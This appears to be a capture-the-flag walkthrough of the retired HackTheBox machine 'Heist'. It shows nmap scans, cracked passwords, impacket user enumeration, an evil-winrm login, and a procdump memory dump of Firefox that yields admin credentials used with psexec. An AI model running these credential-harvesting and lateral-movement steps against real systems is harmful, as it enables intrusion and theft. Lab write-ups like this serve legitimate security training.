We always start with an nmap scan…..
Nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Wed Jul 7 08:15:43 2021 as: nmap -sC -sV -oA nmap 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up (0.51s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 3h00m54s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-07T10:17:59
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 7 08:17:41 2021 -- 1 IP address (1 host up) scanned in 118.25 seconds
Another day another HackTheBox machine so we have our Nmap scan result but before going deep let try to scan if we have winrm port open.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.10.149]
└─$ nmap -sV -sC -p 5985 10.10.10.149
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-07 13:11 WAT
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.56s latency).
PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.52 seconds
Seems we have it open now let start our enumeration on SMB first.
We have no anonymous access to SMB now let hit HTTP.
Trying some default credentials i got no luck also maybe some SQL injection payloads got nothing but we still have Login as guest let try it.
Issues comment ground seems cool also a user hazard attach a file let try and check it out.
We have some hash passwords that belong to hazard i think now let try cracking all.
The website i use in cracking it https://www.ifm.net.nz/cookbooks/passwordcracker.html
0242114B0E143F015F5D1E161713 - $uperP@ssword
02375012182C1A1D751618034F36415408 - Q4)sJu\Y8qz*A3?d
One more hash to go i use john the ripper to crack that.
stealth1agent
Now i think we have 3 users and 3 passwords.
USERNAMES;
rout3r
hazard
admin
PASSWORDS;
$uperP@ssword
Q4)sJu\Y8qz*A3?d
stealth1agent
Which have try using on the login page form but i got no luck now time to go back to SMB maybe we can have access to the SMB trying different combination with the credentials i was able to list some shares with hazard:stealth1agent .
Now let use lookupsid.py from impacket to enumerate more users.
lookupsid.py hazard:stealth1agent@heist.htb
We have more users now but to cut the story short i was able to get in with chase:Q4)sJu\Y8qz*A3?d with winrm using evil-winrm just the way i was able to get hazard password.
evil-winrm -i heist.htb -u chase -p 'Q4)sJu\Y8qz*A3?d'
Going to the user chase desktop and we have user.txt now we just need to owned the system now.
System / Administrator
I spend time enumerating the box so i notice a firefox process running which is strange.
So i uploaded procdump.exe and dumped one of these firefox processes.
upload procdump64.exe
./procdump64.exe -accepteula
./procdump64.exe -ma 2528
Then I uploaded strings.exe.
upload strings64.exe
./strings64.exe -accepteula
Now using strings64.exe to view the firefox dump file.
./strings64.exe firefox.exe_210707_175550.dmp
Searching for password and i got the admin credentials 4dD!5}x/re8]FBuZ nice time to use psexec.py to log in with the admin credentials we found in the firefox dump.
psexec.py administrator@10.10.10.149
We are in and done let get the last flag.
And we are system.
Greeting From Muzec